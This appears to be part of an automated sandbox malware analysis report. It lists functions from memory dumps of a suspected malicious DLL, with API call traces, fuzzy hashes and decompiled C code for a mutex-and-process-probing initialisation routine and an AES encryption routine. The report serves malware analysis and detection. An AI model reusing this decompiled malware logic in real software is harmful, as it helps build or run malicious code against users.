                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,046CCFFD,?,?,?,?,?,?,?), ref: 046D74A0
                • HeapFree.KERNEL32(00000000,?), ref: 046CD031
                • HeapFree.KERNEL32(00000000,?), ref: 046CD042
                • SetLastError.KERNEL32(00000000), ref: 046CD045
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                • String ID:
                • API String ID: 2451549186-0
                • Opcode ID: e4482d5860e2f586a1bd460693494aa4c77e05d119d0352da8007e6a926ba9e0
                • Instruction ID: 09e6695ce7e30e82a468e50c619c409a32dacdfe1c52d0666aef5801b001c951
                • Opcode Fuzzy Hash: e4482d5860e2f586a1bd460693494aa4c77e05d119d0352da8007e6a926ba9e0
                • Instruction Fuzzy Hash: 77312D31900118EFDF129F9ADC448EDBFB5FF54310B10415AF916A7260E7369A61DF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C5E89 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 70efb25f24c2473581d861dc16d28dd1094acc4c1cf118a1837ce09a6b4c8d7a
                • Instruction ID: 629a55a8ece8308e9595db8887ac22c9c6d5c5e4df7461c0b7c4d6492773126e
                • Opcode Fuzzy Hash: 70efb25f24c2473581d861dc16d28dd1094acc4c1cf118a1837ce09a6b4c8d7a
                • Instruction Fuzzy Hash: DE2188B2601919BBDB249F60DC8097ABB29FF19304B00016CEA4686E10E732F8B19FD5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1774D Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E01C1774D(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E01C12114(_t2);
				if(_t34 != 0) {
					_t30 = E01C12114(_t28);
					if(_t30 == 0) {
						E01C12C11(_t34);
					} else {
						_t39 = _a4;
						_t22 = E01C17AD5(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E01C17AD5(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                0x01c1774d
                0x01c17757
                0x01c17759
                0x01c1775f
                0x01c1775f
                0x01c17768
                0x01c1776c
                0x01c17778
                0x01c1777c
                0x01c177f0
                0x01c1777e
                0x01c1777e
                0x01c17782
                0x01c17789
                0x01c1778c
                0x01c177a6
                0x01c17795
                0x01c17795
                0x01c17799
                0x01c1779c
                0x01c177a1
                0x01c177a1
                0x01c177ab
                0x01c177d3
                0x01c177d9
                0x01c177dc
                0x01c177ad
                0x01c177af
                0x01c177b7
                0x01c177c2
                0x01c177c7
                0x01c177c7
                0x01c177e3
                0x01c177ea
                0x01c177eb
                0x01c177eb
                0x01c1777c
                0x01c177fb

                APIs
                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,01C1101D,00000000,00000000,74E481D0,02179618,?,?,01C16C0C,?,02179618), ref: 01C17759
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                  • Part of subcall function 01C17AD5: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,01C17787,00000000,00000001,00000001,?,?,01C1101D,00000000,00000000,74E481D0,02179618), ref: 01C17AE3
                  • Part of subcall function 01C17AD5: StrChrA.SHLWAPI(?,0000003F,?,?,01C1101D,00000000,00000000,74E481D0,02179618,?,?,01C16C0C,?,02179618,0000EA60,?), ref: 01C17AED
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01C1101D,00000000,00000000,74E481D0,02179618,?,?,01C16C0C), ref: 01C177B7
                • lstrcpy.KERNEL32(00000000,74E481D0), ref: 01C177C7
                • lstrcpy.KERNEL32(00000000,00000000), ref: 01C177D3
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 1ea4af261c6f9b2705e27304f59db54b5f57d03befab22514e22bedf7b1cd23c
                • Instruction ID: 44917f562df2cadf20377a86afd5ecba2684762f1abac6cbd5a11308842d9d19
                • Opcode Fuzzy Hash: 1ea4af261c6f9b2705e27304f59db54b5f57d03befab22514e22bedf7b1cd23c
                • Instruction Fuzzy Hash: B021D236540356EBDB129FB8CC84E9A7FA9EF57290F254050F9059B209EB31CA00E7E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C7554 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,046C567E), ref: 046C7560
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                  • Part of subcall function 046E64E1: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,046C758E,00000000,00000001,00000001,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60), ref: 046E64EF
                  • Part of subcall function 046E64E1: StrChrA.SHLWAPI(?,0000003F,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,046C567E,?,?), ref: 046E64F9
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000), ref: 046C75BE
                • lstrcpy.KERNEL32(00000000,74E48170), ref: 046C75CE
                • lstrcpy.KERNEL32(00000000,00000000), ref: 046C75DA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: e8ffd97d0cca01e2180d5cd854ed2afe844121d46202e59a4f04c40aafc0bbe8
                • Instruction ID: 7ed8a7fd1d0404b6004da9985b22fe3a616d2a0bb7e6e4bcf8810f81270a3d51
                • Opcode Fuzzy Hash: e8ffd97d0cca01e2180d5cd854ed2afe844121d46202e59a4f04c40aafc0bbe8
                • Instruction Fuzzy Hash: 9021AF72500216EFDB12AF75C848ABF7FE8EF15295B448068F9059B201FA75EE008BB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CC93A Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: eef43bb9de78a7a91ee7f849e5bd04c0e4f034790cff06ae31a3629565e2eb27
                • Instruction ID: 976613550b56a186376e1e1f427c6f5c7428f4d992e504e5de48d56e61e25d0e
                • Opcode Fuzzy Hash: eef43bb9de78a7a91ee7f849e5bd04c0e4f034790cff06ae31a3629565e2eb27
                • Instruction Fuzzy Hash: BE11A07390190ABBDB20AFA1DC40E76BB28FF09304B04052DFA4992D51E772F5B19BD5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C16C7B Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C16C7B(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E01C12114(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                0x01c16c90
                0x01c16c94
                0x01c16c9e
                0x01c16ca5
                0x01c16ca8
                0x01c16caa
                0x01c16cb2
                0x01c16cb7
                0x01c16cc5
                0x01c16cca
                0x01c16cd4

                APIs
                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,021793D4,?,01C15D75,004F0053,021793D4,?,?,?,?,?,?,01C154C0), ref: 01C16C8B
                • lstrlenW.KERNEL32(01C15D75,?,01C15D75,004F0053,021793D4,?,?,?,?,?,?,01C154C0), ref: 01C16C92
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,01C15D75,004F0053,021793D4,?,?,?,?,?,?,01C154C0), ref: 01C16CB2
                • memcpy.NTDLL(74E069A0,01C15D75,00000002,00000000,004F0053,74E069A0,?,?,01C15D75,004F0053,021793D4), ref: 01C16CC5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: bac787b2860519021eb8c7cf3a05324efd5cfe660d77334ecd7f548a80737e21
                • Instruction ID: 01c01db6dcc5f53f681a5efa01d2bff81f4e95e8c7a4ab0e448018c136a73468
                • Opcode Fuzzy Hash: bac787b2860519021eb8c7cf3a05324efd5cfe660d77334ecd7f548a80737e21
                • Instruction Fuzzy Hash: 13F04F36900119FBCF10DFE9CC44CDE7BACEF0A2587118062EA08D7205E731EA14ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C1D12 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(69B25F44,?,?,00000000,046C357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 046C1D23
                • lstrlen.KERNEL32(?,?,?,00000000,046C357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 046C1D28
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,046C357F,00000000,?,?,00000000,69B25F44,?,?,?), ref: 046C1D44
                • lstrcpy.KERNEL32(00000000,?), ref: 046C1D62
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                • String ID:
                • API String ID: 1697500751-0
                • Opcode ID: b95f21a1c076f9561ad4b5e6ede7fee3c27627a38d1f88b7629a601173c73882
                • Instruction ID: 2522569b4c82265460c4bc2b651049ef0180ace83f671d9e009ab1d8a6e9d0ef
                • Opcode Fuzzy Hash: b95f21a1c076f9561ad4b5e6ede7fee3c27627a38d1f88b7629a601173c73882
                • Instruction Fuzzy Hash: 44F0C2B6400B41EBD731AA6A9C48EABBB99EF86311B04451AE94483211E635E4148FB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C15F46 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(02179B10,00000000,00000000,7691C740,01C176A0,00000000), ref: 01C15F56
                • lstrlen.KERNEL32(?), ref: 01C15F5E
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • lstrcpy.KERNEL32(00000000,02179B10), ref: 01C15F72
                • lstrcat.KERNEL32(00000000,?), ref: 01C15F7D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: 0b847a01bbc8a9c239d8b83cb925578ca5498bf2182713671a7fcbf09687ff1c
                • Instruction ID: a5c14c4816c619a12ccc661fcbc607e08962731c2a02f5ae424aee1d057a88f1
                • Opcode Fuzzy Hash: 0b847a01bbc8a9c239d8b83cb925578ca5498bf2182713671a7fcbf09687ff1c
                • Instruction Fuzzy Hash: 82E09233941261AB87219BE8AC48D9FBBACFFAFA103040416FA01D3118C734C9009BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CD27A Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(04C9CF38,00000000,00000000,74E481D0,046D09F9,00000000), ref: 046CD28A
                • lstrlen.KERNEL32(?), ref: 046CD292
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(00000000,04C9CF38), ref: 046CD2A6
                • lstrcat.KERNEL32(00000000,?), ref: 046CD2B1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: f838e6b2033a59a0c730c8b786be5623ce95e9656145aa0124028e41544e41ef
                • Instruction ID: dad42c0cc69304f458bcb625cf8dc36040ec65ce60432bd31c3f3cb2e06c34b1
                • Opcode Fuzzy Hash: f838e6b2033a59a0c730c8b786be5623ce95e9656145aa0124028e41544e41ef
                • Instruction Fuzzy Hash: 0EE01273501621AB87117BE5AC48C6BBBEDEF99651704541AF600D7100E769DC019BB1
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                Function 04BD4560 Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 42 4bd4560-4bd45a9 RtlInitializeCriticalSection call 4bc8f9e 45 4bd45ab-4bd45cf memset RtlInitializeCriticalSection 42->45 46 4bd45d1-4bd45d3 42->46 47 4bd45d4-4bd45da 45->47 46->47 48 4bd49dc-4bd49e6 47->48 49 4bd45e0-4bd4604 CreateMutexA GetLastError 47->49 50 4bd4606-4bd460b 49->50 51 4bd4621-4bd4623 49->51 52 4bd460d-4bd461a CloseHandle 50->52 53 4bd461f 50->53 54 4bd4629-4bd4634 call 4bd6126 51->54 55 4bd49d7 51->55 52->55 53->51 56 4bd49db 54->56 59 4bd463a-4bd4645 call 4bd75a8 54->59 55->56 56->48 59->56 62 4bd464b-4bd465d GetUserNameA 59->62 63 4bd465f-4bd4677 RtlAllocateHeap 62->63 64 4bd4681-4bd4691 62->64 63->64 65 4bd4679-4bd467f GetUserNameA 63->65 66 4bd469a-4bd46b7 NtQueryInformationProcess 64->66 67 4bd4693-4bd4698 64->67 65->64 69 4bd46bd-4bd46cc OpenProcess 66->69 70 4bd46b9 66->70 67->66 68 4bd46e1-4bd46eb 67->68 71 4bd46ed-4bd4709 GetShellWindow GetWindowThreadProcessId 68->71 72 4bd4728-4bd472c 68->72 73 4bd46ce-4bd46d3 GetLastError 69->73 74 4bd46da-4bd46db CloseHandle 69->74 70->69 75 4bd471b-4bd4722 71->75 76 4bd470b-4bd4711 71->76 77 4bd472e-4bd473e memcpy 72->77 78 4bd4741-4bd4758 call 4bd7d21 72->78 73->68 79 4bd46d5 73->79 74->68 75->72 81 4bd4724 75->81 76->75 80 4bd4713-4bd4719 76->80 77->78 87 4bd475a-4bd475e 78->87 88 4bd4765-4bd476b 78->88 83 4bd4771-4bd47ad call 4bc9677 call 4bc8ffc call 4be41cf 79->83 80->72 81->72 95 4bd47af-4bd47be CreateEventA call 4bc57e0 83->95 96 4bd47c3-4bd47d2 call 4bde8ab 83->96 87->88 90 4bd4760 call 4bcb4b5 87->90 88->56 88->83 90->88 95->96 96->56 100 4bd47d8-4bd47eb RtlAllocateHeap 96->100 100->56 101 4bd47f1-4bd4811 OpenEventA 100->101 102 4bd4833-4bd4835 101->102 103 4bd4813-4bd4822 CreateEventA 101->103 105 4bd4836-4bd485d call 4bd9dc6 102->105 104 4bd4824-4bd482e GetLastError 103->104 103->105 104->56 108 4bd49ca-4bd49d1 105->108 109 4bd4863-4bd4871 105->109 108->56 110 4bd4877-4bd488f call 4bccea8 109->110 111 4bd4923-4bd4929 109->111 110->56 127 4bd4895-4bd489c 110->127 112 4bd492b-4bd4930 call 4bd7341 call 4bc9d25 111->112 113 4bd4935-4bd493c 111->113 112->113 113->55 116 4bd4942-4bd4947 113->116 119 4bd4949-4bd494f 116->119 120 4bd49a3-4bd49c8 call 4bd9dc6 116->120 124 4bd495e-4bd4974 RtlAllocateHeap 119->124 125 4bd4951-4bd4958 SetEvent 119->125 120->108 130 4bd49d3-4bd49d4 120->130 128 4bd4976-4bd499d wsprintfA 124->128 129 4bd49a0-4bd49a2 124->129 125->124 131 4bd489e-4bd48aa 127->131 132 4bd48b0-4bd48c4 LoadLibraryA 127->132 128->129 129->120 130->55 131->132 133 4bd48c6-4bd48ee call 4be4b16 132->133 134 4bd48f3-4bd4906 call 4bcdb44 132->134 133->134 134->56 138 4bd490c-4bd4915 134->138 138->113 139 4bd4917-4bd4921 call 4be25fc 138->139 139->113
                APIs
                • RtlInitializeCriticalSection.NTDLL(04BEE4A8), ref: 04BD457E
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memset.NTDLL ref: 04BD45AF
                • RtlInitializeCriticalSection.NTDLL(0624C0A0), ref: 04BD45C0
                  • Part of subcall function 04BD6126: RtlInitializeCriticalSection.NTDLL(04BEE480), ref: 04BD614A
                  • Part of subcall function 04BD6126: RtlInitializeCriticalSection.NTDLL(04BEE460), ref: 04BD6160
                  • Part of subcall function 04BD6126: GetVersion.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD6171
                  • Part of subcall function 04BD6126: GetModuleHandleA.KERNEL32(000015DB,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD61A5
                  • Part of subcall function 04BD75A8: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 04BD75C2
                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD45E9
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD45FA
                • CloseHandle.KERNEL32(000002B4,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD460E
                • GetUserNameA.ADVAPI32(00000000,?), ref: 04BD4657
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD466A
                • GetUserNameA.ADVAPI32(00000000,?), ref: 04BD467F
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 04BD46AF
                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD46C4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD46CE
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD46DB
                • GetShellWindow.USER32 ref: 04BD46F6
                • GetWindowThreadProcessId.USER32(00000000), ref: 04BD46FD
                • memcpy.NTDLL(04BEE374,?,00000018,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD4739
                • CreateEventA.KERNEL32(04BEE268,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD47B7
                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04BD47E1
                • OpenEventA.KERNEL32(00100000,00000000,0624B9D0,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD4809
                • CreateEventA.KERNEL32(04BEE268,00000001,00000000,0624B9D0,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD481E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD4824
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD48BC
                • SetEvent.KERNEL32(?,04BE3A35,00000000,00000000,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BD4952
                • RtlAllocateHeap.NTDLL(00000000,00000043,04BE3A35), ref: 04BD4967
                • wsprintfA.USER32 ref: 04BD4997
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                • String ID:
                • API String ID: 3929413950-0
                • Opcode ID: 054ef15d0940e7c110941593c02cd6cf842dd3660cbb40efa9574b24495592ff
                • Instruction ID: a226696ffb7c9cafe1f0f51a14118ce6733f3e785c38a1492a99b6f5615f3c06
                • Opcode Fuzzy Hash: 054ef15d0940e7c110941593c02cd6cf842dd3660cbb40efa9574b24495592ff
                • Instruction Fuzzy Hash: 13C159B09002459FD720EF67E88892A7BE8EBC5714B0148EFE54A8B141E779F854CB72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F78F2 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 221 31f78f2-31f7932 CryptAcquireContextW 222 31f7a89-31f7a8f GetLastError 221->222 223 31f7938-31f7974 memcpy CryptImportKey 221->223 224 31f7a92-31f7a99 222->224 225 31f797a-31f798c CryptSetKeyParam 223->225 226 31f7a74-31f7a7a GetLastError 223->226 228 31f7992-31f799b 225->228 229 31f7a60-31f7a66 GetLastError 225->229 227 31f7a7d-31f7a87 CryptReleaseContext 226->227 227->224 231 31f799d-31f799f 228->231 232 31f79a3-31f79b0 call 31f2114 228->232 230 31f7a69-31f7a72 CryptDestroyKey 229->230 230->227 231->232 233 31f79a1 231->233 236 31f7a57-31f7a5e 232->236 237 31f79b6-31f79bf 232->237 233->232 236->230 238 31f79c2-31f79ca 237->238 239 31f79cf-31f79ec memcpy 238->239 240 31f79cc 238->240 241 31f79ee-31f7a05 CryptEncrypt 239->241 242 31f7a07-31f7a16 CryptDecrypt 239->242 240->239 243 31f7a1c-31f7a1e 241->243 242->243 244 31f7a2e-31f7a39 GetLastError 243->244 245 31f7a20-31f7a2a 243->245 247 31f7a4d-31f7a55 call 31f2c11 244->247 248 31f7a3b-31f7a4b 244->248 245->238 246 31f7a2c 245->246 246->248 247->230 248->230
                C-Code - Quality: 58%
                			E031F78F2(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x31fa0a8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x31fa0d0() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E031F2114(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x31fa0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E031F2C11(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                0x031f78fb
                0x031f7901
                0x031f7904
                0x031f790a
                0x031f790a
                0x031f790c
                0x031f790e
                0x031f7911
                0x031f7917
                0x031f7918
                0x031f7919
                0x031f791f
                0x031f7924
                0x031f792a
                0x031f7932
                0x031f7a8f
                0x031f7938
                0x031f793a
                0x031f7943
                0x031f7948
                0x031f795a
                0x031f795d
                0x031f7961
                0x031f7968
                0x031f796c
                0x031f7974
                0x031f7a7a
                0x031f797a
                0x031f797a
                0x031f797e
                0x031f797f
                0x031f7981
                0x031f798c
                0x031f7a66
